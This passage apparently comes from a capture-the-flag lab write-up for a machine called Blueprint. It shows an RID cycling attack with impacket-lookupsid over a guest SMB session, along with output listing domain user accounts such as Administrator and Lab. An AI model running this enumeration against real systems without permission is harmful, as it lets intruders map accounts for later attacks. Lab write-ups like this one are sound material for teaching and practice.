RID Cycling
The target SMB server allows guest session with read access to the IPC$ share.
This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs.
┌──(kali㉿kali)-[~/archive/thm/blueprint]
└─$ impacket-lookupsid blah@$IP 100000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 10.10.136.191
[*] StringBinding ncacn_np:10.10.136.191[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3130159037-241736515-3168549210
500: BLUEPRINT\Administrator (SidTypeUser)
501: BLUEPRINT\Guest (SidTypeUser)
513: BLUEPRINT\None (SidTypeGroup)
1000: BLUEPRINT\Lab (SidTypeUser)
1001: BLUEPRINT\TelnetClients (SidTypeAlias)Performing the RID cycling attack with an arbitrary credential against the target SMB service; blahblah
Lab account has been identified.